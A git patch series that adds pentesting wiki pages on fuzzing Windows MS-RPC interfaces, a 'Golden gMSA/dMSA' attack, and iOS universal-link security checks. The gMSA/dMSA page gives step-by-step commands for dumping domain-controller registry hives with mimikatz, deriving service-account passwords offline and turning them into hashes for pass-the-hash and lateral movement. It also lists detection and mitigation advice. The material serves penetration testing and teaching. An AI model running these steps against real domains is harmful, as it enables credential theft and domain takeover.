From 67c71ffe9378e263e6a9c15496dcc4c8930b602d Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 15 Jul 2025 18:31:32 +0000 Subject: [PATCH 1/3] Add content from: MS-RPC Fuzzer --- .../135-pentesting-msrpc.md | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index 8e58a3f7d..12351c91e 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md @@ -89,11 +89,73 @@ It is possible to execute remote code on a machine, if the credentials of a vali The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. +## Automated Fuzzing of MSRPC Interfaces + +MS-RPC interfaces expose a large and often undocumented attack surface. The open-source [MS-RPC-Fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) PowerShell module builds on James Forshaw’s `NtObjectManager` to *dynamically* create RPC client stubs from the interface metadata that is already present in Windows binaries. Once a stub exists the module can bombard each procedure with mutated inputs and log the outcome, making **reproducible, large-scale fuzzing of RPC endpoints possible without writing a single line of IDL**. + +### 1. Inventory the interfaces + +```powershell +# Import the module (download / git clone first) +Import-Module .\MS-RPC-Fuzzer.psm1 + +# Parse a single binary +Get-RpcServerData -Target "C:\Windows\System32\efssvc.dll" -OutPath .\output + +# Or crawl the whole %SystemRoot%\System32 directory +Get-RpcServerData -OutPath .\output +``` + +`Get-RpcServerData` will extract the UUID, version, binding strings (named-pipe / TCP / HTTP) and **full procedure prototypes** for every interface it encounters and store them in `rpcServerData.json`. + +### 2. Run the fuzzer + +```powershell +'.\output\rpcServerData.json' | + Invoke-RpcFuzzer -OutPath .\output ` + -MinStrLen 100 -MaxStrLen 1000 ` + -MinIntSize 9999 -MaxIntSize 99999 +``` + +Relevant options: + +* `-MinStrLen` / `-MaxStrLen` – size range for generated strings +* `-MinIntSize` / `-MaxIntSize` – value range for mutated integers (useful for overflow testing) +* `-Sorted` – execute procedures in an order that honours **parameter dependencies** so that outputs of one call can serve as inputs of the next (dramatically increases reachable paths) + +The fuzzer implements 2 strategies: + +1. **Default fuzzer** – random primitive values + default instances for complex types +2. **Sorted fuzzer** – dependency-aware ordering (see `docs/Procedure dependency design.md`) + +Every call is written atomically to `log.txt`; after a crash the **last line immediately tells you the offending procedure**. The result of each call is also categorised into three JSON files: + +* `allowed.json` – call succeeded and returned data +* `denied.json` – server responded with *Access Denied* +* `error.json` – any other error / crash + +### 3. Visualise with Neo4j + +```powershell +'.\output\allowed.json' | + Import-DataToNeo4j -Neo4jHost 192.168.56.10:7474 -Neo4jUsername neo4j +``` + +`Import-DataToNeo4j` converts the JSON artefacts into a graph structure where: + +* RPC servers, interfaces and procedures are **nodes** +* Interactions (`ALLOWED`, `DENIED`, `ERROR`) are **relationships** + +Cypher queries can then be used to quickly spot dangerous procedures or to replay the exact chain of calls that preceded a crash. + +⚠️ The fuzzer is *destructive*: expect service crashes and even BSODs – always run it in an isolated VM snapshot. + ## References - [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) - [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) - [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) +- [MS-RPC-Fuzzer (GitHub)](https://github.com/warpnet/MS-RPC-Fuzzer) {{#include ../banners/hacktricks-training.md}} From 3c61a29fb763b1e133241ebe862c6f2995b0ecb3 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 17 Jul 2025 01:30:51 +0000 Subject: [PATCH 2/3] Add content from: Golden dMSA --- src/SUMMARY.md | 1 + .../active-directory-methodology/README.md | 8 +- .../golden-dmsa-gmsa.md | 120 ++++++++++++++++++ 3 files changed, 128 insertions(+), 1 deletion(-) create mode 100644 src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 9ab45b360..596676a81 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -268,6 +268,7 @@ - [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md) - [External Forest Domain - OneWay (Inbound) or bidirectional](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md) - [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md) + - [Golden Dmsa Gmsa](windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md) - [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) - [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) - [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md) diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index 9567c394e..db4eac643 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -638,7 +638,13 @@ For in-depth information, one might explore research on [Bypassing SID Filtering An attack vector involves targeting privileged gMSAs within the domain. The KDS Root key, essential for calculating gMSAs' passwords, is stored within the Configuration NC. With SYSTEM privileges on any DC, it's possible to access the KDS Root key and compute the passwords for any gMSA across the forest. -Detailed analysis can be found in the discussion on [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent). +Detailed analysis and step-by-step guidance can be found in: + +{{#ref}} +golden-dmsa-gmsa.md +{{#endref}} + +Additional external research: [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent). **Schema change attack** diff --git a/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md b/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md new file mode 100644 index 000000000..f9144b2c9 --- /dev/null +++ b/src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md @@ -0,0 +1,120 @@ +# Golden gMSA/dMSA Attack (Offline Derivation of Managed Service Account Passwords) + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +Windows Managed Service Accounts (MSA) are special principals designed to run services without the need to manually manage their passwords. +There are two major flavours: + +1. **gMSA** – group Managed Service Account – can be used on multiple hosts that are authorised in its `msDS-GroupMSAMembership` attribute. +2. **dMSA** – delegated Managed Service Account – the (preview) successor to gMSA, relying on the same cryptography but allowing more granular delegation scenarios. + +For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from: + +* The forest-wide **KDS Root Key** (`KRBTGT\KDS`) – randomly generated GUID-named secret, replicated to every DC under the `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …` container. +* The target account **SID**. +* A per-account **ManagedPasswordID** (GUID) found in the `msDS-ManagedPasswordId` attribute. + +The derivation is: `AES256_HMAC( KDSRootKey , SID || ManagedPasswordID )` → 240 byte blob finally **base64-encoded** and stored in the `msDS-ManagedPassword` attribute. +No Kerberos traffic or domain interaction is required during normal password usage – a member host derives the password locally as long as it knows the three inputs. + +## Golden gMSA / Golden dMSA Attack + +If an attacker can obtain all three inputs **offline** they can compute **valid current and future passwords** for **any gMSA/dMSA in the forest** without touching the DC again, bypassing: + +* Kerberos pre-authentication / ticket request logs +* LDAP read auditing +* Password change intervals (they can pre-compute) + +This is analogous to a *Golden Ticket* for service accounts. + +### Prerequisites + +1. **Forest-level compromise** of **one DC** (or Enterprise Admin). `SYSTEM` access is enough. +2. Ability to enumerate service accounts (LDAP read / RID brute-force). +3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code. + +### Phase 1 – Extract the KDS Root Key + +Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets): + +```cmd +reg save HKLM\SECURITY security.hive +reg save HKLM\SYSTEM system.hive + +# With mimikatz on the DC / offline +mimikatz # lsadump::secrets +mimikatz # lsadump::trust /patch # shows KDS root keys too +``` +The base64 string labelled `RootKey` (GUID name) is required in later steps. + +### Phase 2 – Enumerate gMSA/dMSA objects + +Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`: + +```powershell +# Authenticated or anonymous depending on ACLs +Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \ + Select sAMAccountName,objectSid,msDS-ManagedPasswordId +``` + +[`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes: + +```powershell +# LDAP enumeration (kerberos / simple bind) +GoldendMSA.exe info -d example.local -m ldap + +# RID brute force if anonymous binds are blocked +GoldendMSA.exe info -d example.local -m brute -r 5000 -u jdoe -p P@ssw0rd +``` + +### Phase 3 – Guess / Discover the ManagedPasswordID (when missing) + +Some deployments *strip* `msDS-ManagedPasswordId` from ACL-protected reads. +Because the GUID is 128-bit, naïve bruteforce is infeasible, but: + +1. The first **32 bits = Unix epoch time** of the account creation (minutes resolution). +2. Followed by 96 random bits. + +Therefore a **narrow wordlist per account** (± few hours) is realistic. + +```powershell +GoldendMSA.exe wordlist -s -d example.local -f example.local -k +``` +The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute – the match reveals the correct GUID. + +### Phase 4 – Offline Password Computation & Conversion + +Once the ManagedPasswordID is known, the valid password is one command away: + +```powershell +# derive base64 password +GoldendMSA.exe compute -s -k -d example.local -m + +# convert to NTLM / AES keys for pass-the-hash / pass-the-ticket +GoldendMSA.exe convert -d example.local -u svc_web$ -p +``` +The resulting hashes can be injected with **mimikatz** (`sekurlsa::pth`) or **Rubeus** for Kerberos abuse, enabling stealth **lateral movement** and **persistence**. + +## Detection & Mitigation + +* Restrict **DC backup and registry hive read** capabilities to Tier-0 administrators. +* Monitor **Directory Services Restore Mode (DSRM)** or **Volume Shadow Copy** creation on DCs. +* Audit reads / changes to `CN=Master Root Keys,…` and `userAccountControl` flags of service accounts. +* Detect unusual **base64 password writes** or sudden service password reuse across hosts. +* Consider converting high-privilege gMSAs to **classic service accounts** with regular random rotations where Tier-0 isolation is not possible. + +## Tooling + +* [`Semperis/GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) – reference implementation used in this page. +* [`mimikatz`](https://github.com/gentilkiwi/mimikatz) – `lsadump::secrets`, `sekurlsa::pth`, `kerberos::ptt`. +* [`Rubeus`](https://github.com/GhostPack/Rubeus) – pass-the-ticket using derived AES keys. + +## References + +- [Golden dMSA – authentication bypass for delegated Managed Service Accounts](https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/) +- [Semperis/GoldenDMSA GitHub repository](https://github.com/Semperis/GoldenDMSA) +- [Improsec – Golden gMSA trust attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file From ae67277352f10a1386824fcaae1e32125a5b5be7 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 17 Jul 2025 01:44:12 +0000 Subject: [PATCH 3/3] Add content from: Research Update: Enhanced src/mobile-pentesting/ios-pentesti... --- .../ios-pentesting/ios-universal-links.md | 38 +++++++++++++++++-- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md index 6e97b255a..3ece177ae 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md +++ b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md @@ -26,7 +26,19 @@ If working with a compiled application, entitlements can be extracted as outline ### **Retrieving the Apple App Site Association File** -The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. Ensure the file is accessible via HTTPS directly at `https:///apple-app-site-association`. Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process. +The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. Ensure the file is accessible via HTTPS directly at `https:///apple-app-site-association` (or `/.well-known/apple-app-site-association`). Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process. + +> **Quick enumeration from a macOS/Linux shell** +> +> ```bash +> # assuming you have extracted the entitlements to ent.xml +> doms=$(plutil -extract com.apple.developer.associated-domains xml1 -o - ent.xml | \ +> grep -oE 'applinks:[^<]+' | cut -d':' -f2) +> for d in $doms; do +> echo "[+] Fetching AASA for $d"; +> curl -sk "https://$d/.well-known/apple-app-site-association" | jq '.' +> done +> ``` ### **Handling Universal Links in the App** @@ -78,16 +90,34 @@ func application(_ application: UIApplication, Through **diligent configuration and validation**, developers can ensure that universal links enhance user experience while maintaining security and privacy standards. +## Common Vulnerabilities & Pentesting Checks + +| # | Weakness | How to test | Exploitation / Impact | +|---|----------|------------|-----------------------| +| 1 | **Over-broad `paths` / `components`** in the AASA file (e.g. `"/": "*"` or wildcards such as `"/a/*"`). | • Inspect the downloaded AASA and look for `*`, trailing slashes, or `{"?": …}` rules.
• Try to request unknown resources that still match the rule (`https://domain.com/a/evil?_p_dp=1`). | Universal-link hijacking: a malicious iOS app that registers the same domain could claim all those links and present phishing UI. A real-world example is the May 2025 Temu.com bug-bounty report where an attacker could redirect any `/a/*` path to their own app. | +| 2 | **Missing server-side validation** of deep-link paths. | After identifying the allowed paths, issue `curl`/Burp requests to non-existing resources and observe HTTP status codes. Anything other than `404` (e.g. 200/302) is suspicious. | An attacker can host arbitrary content behind an allowed path and serve it via the legitimate domain, increasing the success rate of phishing or session-token theft. | +| 3 | **App-side URL handling without scheme/host whitelisting** (CVE-2024-10474 – Mozilla Focus < 132). | Look for direct `openURL:`/`open(_:options:)` calls or JavaScript bridges that forward arbitrary URLs. | Internal pages can smuggle `myapp://` or `https://` URLs that bypass the browser’s URL-bar safety checks, leading to spoofing or unintended privileged actions. | +| 4 | **Use of wildcard sub-domains** (`*.example.com`) in the entitlement. | `grep` for `*.` in the entitlements. | If any sub-domain is taken over (e.g. via an unused S3 bucket), the attacker automatically gains the Universal Link binding. | + +### Quick Checklist + +* [ ] Extract entitlements and enumerate every `applinks:` entry. +* [ ] Download AASA for each entry and audit for wildcards. +* [ ] Verify the web server returns **404** for undefined paths. +* [ ] In the binary, confirm that **only** trusted hosts/schemes are handled. +* [ ] If the app uses the newer `components` syntax (iOS 11+), fuzz query-parameter rules (`{"?":{…}}`). + ## Tools - [GetUniversal.link](https://getuniversal.link/): Helps simplify the testing and management of your app's Universal Links and AASA file. Simply enter your domain to verify AASA file integrity or use the custom dashboard to easily test link behavior. This tool also helps you determine when Apple will next index your AASA file. +- [Knil](https://github.com/ethanhuang13/knil): Open-source iOS utility that fetches, parses and lets you **tap-test** every Universal Link declared by a domain directly on device. +- [universal-link-validator](https://github.com/urbangems/universal-link-validator): CLI / web validator that performs strict AASA conformance checks and highlights dangerous wildcards. ## References - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis) - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) +- [https://medium.com/@m.habibgpi/universal-link-hijacking-via-misconfigured-aasa-file-on-temu-com-eadfcb745e4e](https://medium.com/@m.habibgpi/universal-link-hijacking-via-misconfigured-aasa-file-on-temu-com-eadfcb745e4e) +- [https://nvd.nist.gov/vuln/detail/CVE-2024-10474](https://nvd.nist.gov/vuln/detail/CVE-2024-10474) {{#include ../../banners/hacktricks-training.md}} - - -